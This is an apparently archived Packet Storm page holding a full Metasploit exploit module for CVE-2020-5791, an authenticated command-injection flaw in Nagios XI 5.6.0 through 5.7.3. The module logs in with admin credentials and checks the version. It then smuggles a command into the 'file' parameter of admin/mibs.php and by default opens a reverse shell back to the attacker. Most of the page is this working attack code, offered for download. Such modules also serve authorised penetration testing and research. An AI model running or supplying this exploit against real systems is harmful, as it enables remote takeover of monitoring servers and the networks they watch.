exploit the possibilities

Nagios XI 5.7.3 Remote Code Execution

Nagios XI 5.7.3 Remote Code Execution
Posted Apr 19, 2021
Authored by Chris Lyne, Matthew Aberegg, Erik Wynter | Site metasploit.com

This Metasploit module exploits CVE-2020-5791, an OS command injection vulnerability on Nagios XI versions 5.6.0 through 5.7.3 in admin/mibs.php that enables an authenticated user with admin privileges to achieve remote code execution as either the apache user or the www-data user.

tags | exploit, remote, php, code execution
advisories | CVE-2020-5791
MD5 | 639bef5044c0f11d63a9c893409809f3

Nagios XI 5.7.3 Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::NagiosXi
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Nagios XI 5.6.0-5.7.3 - Mibs.php Authenticated Remote Code Exection',
'Description' => %q{
This module exploits CVE-2020-5791, an OS command injection vulnerability in
`admin/mibs.php` that enables an authenticated user with admin privileges to achieve
remote code execution as either the `apache` user or the `www-data` user on NagiosXI
version 5.6.0 to 5.7.3 inclusive (exact user depends on the version of NagiosXI
installed as well as the OS its installed on).

Valid credentials for a Nagios XI admin user are required. This module has
been successfully tested against Nagios XI 5.7.3 running on CentOS 7.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Lyne', # discovery
'Matthew Aberegg', # PoC
'Erik Wynter' # @wyntererik - Metasploit
],
'References' =>
[
['CVE', '2020-5791'],
['EDB', '48959']
],
'Platform' => %w[linux unix],
'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
'Targets' =>
[
[
'Linux (x86/x64)', {
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Platform' => 'linux',
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
}
],
[
'CMD', {
'Arch' => [ ARCH_CMD ],
'Platform' => 'unix',
# the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' }
}
]
],
'Privileged' => false,
'DisclosureDate' => '2020-10-20',
'DefaultTarget' => 0,
'Notes' =>
{
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
}
)
)

register_options [
OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),
OptString.new('PASSWORD', [true, 'Password to authenticate with', nil])
]
end

def username
datastore['USERNAME']
end

def password
datastore['PASSWORD']
end

def finish_install
datastore['FINISH_INSTALL']
end

def check
# Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
# an array containing the http response body of a get request to index.php and the session cookies
login_result, res_array = nagios_xi_login(username, password, finish_install)
case login_result
when 1..3 # An error occurred
return CheckCode::Unknown(res_array[0])
when 4 # Nagios XI is not fully installed
install_result = install_nagios_xi(password)
if install_result
return CheckCode::Unknown(install_result[1])
end

login_result, res_array = login_after_install_or_license(username, password, finish_install)
case login_result
when 1..3 # An error occurred
return CheckCode::Unknown(res_array[0])
when 4 # Nagios XI is still not fully installed
return CheckCode::Detected('Failed to install Nagios XI on the target.')
end
end

# when 5 is excluded from the case statement above to prevent having to use this code block twice.
# Including when 5 would require using this code block once at the end of the `when 4` code block above, and once here.
if login_result == 5 # the Nagios XI license agreement has not been signed
auth_cookies, nsp = res_array
sign_license_result = sign_license_agreement(auth_cookies, nsp)
if sign_license_result
return CheckCode::Unknown(sign_license_result[1])
end

login_result, res_array = login_after_install_or_license(username, password, finish_install)
case login_result
when 1..3
return CheckCode::Unknown(res_array[0])
when 5 # the Nagios XI license agreement still has not been signed
return CheckCode::Detected('Failed to sign the license agreement.')
end
end

print_good('Successfully authenticated to Nagios XI')

# Obtain the Nagios XI version
@auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already

nagios_version = nagios_xi_version(res_array[0])
if nagios_version.nil?
return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
end

print_status("Target is Nagios XI with version #{nagios_version}")

if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
nagios_version = '1.0.0' # Set to really old version as a placeholder. Basically we don't want to exploit these versions.
end

# check if the target is actually vulnerable
version = Rex::Version.new(nagios_version)
if version >= Rex::Version.new('5.6.0') && version <= Rex::Version.new('5.7.3')
return CheckCode::Appears
end

return CheckCode::Safe
end

def execute_command(cmd, _opts = {})
# execute payload
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin', 'mibs.php'),
'cookie' => @auth_cookies,
'vars_get' =>
{
'mode' => 'undo-processing',
'type' => '2',
'file' => ";#{cmd};"
}
}, 0) # don't wait for a response from the target, otherwise the module will in most cases hang for a few seconds after executing the payload
end

def exploit
if target.arch.first == ARCH_CMD
print_status('Executing the payload')
execute_command(payload.encoded)
else
execute_cmdstager(background: true)
end
end
end
Login or Register to add favorites

File Archive:

December 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    18 Files
  • 2
    Dec 2nd
    11 Files
  • 3
    Dec 3rd
    23 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    13 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    19 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close